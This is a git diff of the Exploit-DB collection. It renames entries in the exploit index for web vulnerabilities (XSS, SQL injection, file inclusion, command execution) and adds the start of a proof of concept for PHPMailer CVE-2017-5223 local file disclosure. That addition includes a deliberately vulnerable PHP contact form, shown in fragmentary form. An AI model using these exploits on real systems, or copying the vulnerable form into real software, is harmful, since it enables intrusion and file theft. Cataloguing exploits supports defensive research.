1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 @@ -31985,7 +31987,7 @@ id,file,description,date,author,platform,type,port 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Cross-Site Scripting Multiple Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 -30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 +30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - 'session.cgi' Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - 'index.php' SQL Injection",2007-09-24,"nights shadow",php,webapps,0 30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - 'edit.jsp?edittime' Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 @@ -32025,7 +32027,7 @@ id,file,description,date,author,platform,type,port 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,php,webapps,0 -30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0 +30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - \Report.cgi' Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - 'Content Management System main.php' SQL Injection",2007-10-11,durito,php,webapps,0 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps,0 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - 'Merchant shop.php' SQL Injection",2007-10-11,durito,php,webapps,0 @@ -33715,7 +33717,7 @@ id,file,description,date,author,platform,type,port 33487,platforms/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Persistent Cross-Site Scripting Multiple Vulnerabilities",2014-05-24,"Dolev Farhi",multiple,webapps,0 -33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 +33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - 'books.cgi' Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 33582,platforms/php/webapps/33582.txt,"Joomla! Component com_rsgallery2 2.0 - 'catid' SQL Injection",2010-01-31,snakespc,php,webapps,0 33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps,0 @@ -35067,7 +35069,7 @@ id,file,description,date,author,platform,type,port 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Cross-Site Scripting Multiple Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 -35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 +35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,php,webapps,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - '/login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 @@ -36262,7 +36264,7 @@ id,file,description,date,author,platform,type,port 37560,platforms/php/webapps/37560.txt,"WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 -37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Authenticated Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 +37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Authenticated Remote Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 @@ -37317,7 +37319,7 @@ id,file,description,date,author,platform,type,port 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x/5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0 39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 -39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 +39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39730,platforms/ruby/webapps/39730.txt,"NationBuilder - Persistent Cross-Site Scripting Multiple Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 diff --git a/platforms/php/local/43056.py b/platforms/php/local/43056.py new file mode 100755 index 000000000..e8acf14fb --- /dev/null +++ b/platforms/php/local/43056.py @@ -0,0 +1,65 @@ +# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223) +# Date: 2017-10-25 +# Exploit Author: Maciek Krupa +# All credit only to Yongxiang Li of Asiasecurity +# Software Link: https://github.com/PHPMailer/PHPMailer +# Version: 5.2.21 +# Tested on: Linux Debian 9 +# CVE : CVE-2017-5223 + +// PoC // + +It requires a contact form that sends HTML emails and allows to send a copy to your e-mail + +// vulnerable form example // + +SetFrom($_POST["your-email"], $_POST["your-name"]); +$address = "admin@localhost"; +$mail->AddAddress($address, "root"); +if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]); +$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)"; +$mail->MsgHTML($_POST["your-message"]); +if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!"; +} +?> +